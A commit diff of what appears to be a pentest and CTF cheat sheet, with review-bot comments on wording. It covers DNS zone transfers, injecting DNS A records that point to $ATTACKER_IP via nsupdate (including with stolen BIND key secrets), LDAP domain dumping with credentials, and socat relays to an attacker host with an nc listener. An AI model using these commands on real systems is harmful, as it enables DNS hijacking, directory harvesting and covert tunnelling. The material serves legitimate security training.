Compare commits


No commits in common. "3f066cb6639a2cb05c0e46e5b6cffc9e716b6d83" and "74e0c3e76a886c164c955ca0d8f79bbbb258d1d3" have entirely different histories.

3 changed files with 34 additions and 47 deletions

View File

@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr drill @$TARGET_DNS $DOMAIN axfr
``` ```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration. * [subrake](https://github.com/hash3liZer/Subrake.git)
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
## Join a Domain ## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk * Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh ```sh
nsupdate nsupdate
server <DNS-IP> server <DNS-IP>
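Review bot: In the head column the `* [subrake](https://github.com/hash3liZer/Subrake.git)` bullet is split from its description `A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.`, so it renders as a bullet followed by a loose paragraph; fold the description into the bullet (dropping the base column's `sudbdomain` typo along the way is fine). Under `## Join a Domain`, `needs cert and Pk` is unclear in both columns: spell out the abbreviation and say which certificate and key are meant, so the reader knows what to have in hand before running `nsupdate`.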
@ -22,11 +22,11 @@ update add <sub.domain.com> 1234 A $ATTACKER_IP
send send
quit quit
``` ```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup. * Check domain by querying the subdomain's A record via dig/drill/nslookup
### Found Secrets for Keys ### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain. If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh ```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret> nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key... Creating key...
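Review bot: The head column's rewrite of the `### Found Secrets for Keys` paragraph introduces the typo `possiblity` and the ungrammatical `If there is the possiblity of found secret for a key`; something like `If a key secret is found, for example in /etc/bind/named.conf, it can be used to send authenticated updates` reads better than either column. Worth one sentence next to `nsupdate -d -y <hash algorithm>:<name of the key>:<secret>` as well: BIND's `nsupdate` documents the `-y` argument as `[hmac:]keyname:secret`, and a secret passed on the command line is visible in the process list, so `-k <keyfile>` is the safer option on a shared host.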
@ -34,10 +34,10 @@ namefromtext
keycreate keycreate
server <domain> server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send send
``` ```
*Hint*: Copy the lines, every space counts as it has to be exactly like in the example Copy the lines, every space counts as it has to be exactly like in the example
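Review bot: The head column replaces the placeholder `update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP` with the lab-specific `update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP`, which ties a generic cheat-sheet step to one target; keep the placeholder (the base column's version) and, if a concrete example is wanted, show it beside the placeholder rather than instead of it. The head side also drops the `*Hint*:` label from `Copy the lines, every space counts as it has to be exactly like in the example`, leaving that sentence hanging directly after the closing fence; keep the label or set it off as its own note.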

View File

@ -2,7 +2,6 @@
## Get Domain ## Get Domain
Use the `ldapsearch` tool to receive information from an LDAP server.
```sh ```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
``` ```
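Review bot: Deleting `Use the `ldapsearch` tool to receive information from an LDAP server.` leaves `## Get Domain` with a bare command and no explanation; keep a one-line intro and make it say what the command does: `-x` is a simple (here anonymous) bind, `-s base` with no `-b` queries the root DSE, and `namingcontexts` returns the naming contexts, i.e. the base DN to plug into the later `-b 'DC=<DC>,DC=<ORG>'` searches.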
@ -17,8 +16,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > o
## Domain Dump ## Domain Dump
If a set of LDAP credentials is known dump the domain via * If a set of credentials are known via
```sh ```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
``` ```
The result is a set of HTML files, take a look at them. * Take a look at the genreated HTML files
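Review bot: `* If a set of credentials are known via` in the head column is ungrammatical (`a set ... is`) and ends on a dangling `via` with no object; the base column's `If a set of LDAP credentials is known dump the domain via` says what is being done and should be kept. Likewise `genreated` in `* Take a look at the genreated HTML files` should be `generated`; the base wording `The result is a set of HTML files, take a look at them.` is fine as it stands.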

View File

@ -92,49 +92,37 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
### Socat ### Socat
#### Local PortForwarding via Socat
Open a local port (here 80) on a network interface
```sh
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
```
#### Open a reverse shell via Socat
* Reverse shell on target via * Reverse shell on target via
```sh ```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 & ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
``` ```
* Attacking bind shell on attacker * Attacking bind shell
```sh ```sh
sudo nc -lvnp 443 sudo nc -lvnp 443
``` ```
#### Jumpserver via Socat * Relay on jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Relay on a jumpserver via * Quiet Port Forwarding
```sh * On attacker
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 & ```sh
``` socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
#### Quiet Port Forwarding Through a Relay Server via Socat * Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
#### Forward Local Port via Socat
* In need of a Download on target, expose a port on the attacker via relay * In need of a Download on target, expose a port on the attacker via relay
```sh ```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80 socat tcp-l:80,fork tcp:$ATTACKER_IP:80
``` ```
### Chisel ### Chisel
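Review bot: The head column drops the `#### Local PortForwarding via Socat` block (`./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80`) and all of the `####` subheadings without a replacement, so the socat section becomes one flat bullet run; restore that example and the subheadings, and check the relay step, because in the head column as shown `* Relay on jumpserver via` is immediately followed by `* Quiet Port Forwarding` with no command between them, so if `./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &` was meant to stay, it needs to be put back. Two labels are misleading in both columns: `./socat tcp-l:8000 tcp:<attacker-IP>:443 &` under `Reverse shell on target` is a listener that forwards whatever connects to target port 8000 out to `<attacker-IP>:443`, i.e. a relay, not a shell, and `sudo nc -lvnp 443` under `Attacking bind shell` is the attacker's listener for that relay, so `relay` and `listener` would be the accurate words. The head's `* Open `localhost:8000`` should also say on which side (the attacker's, as the base column's `__Notes__` sentence did).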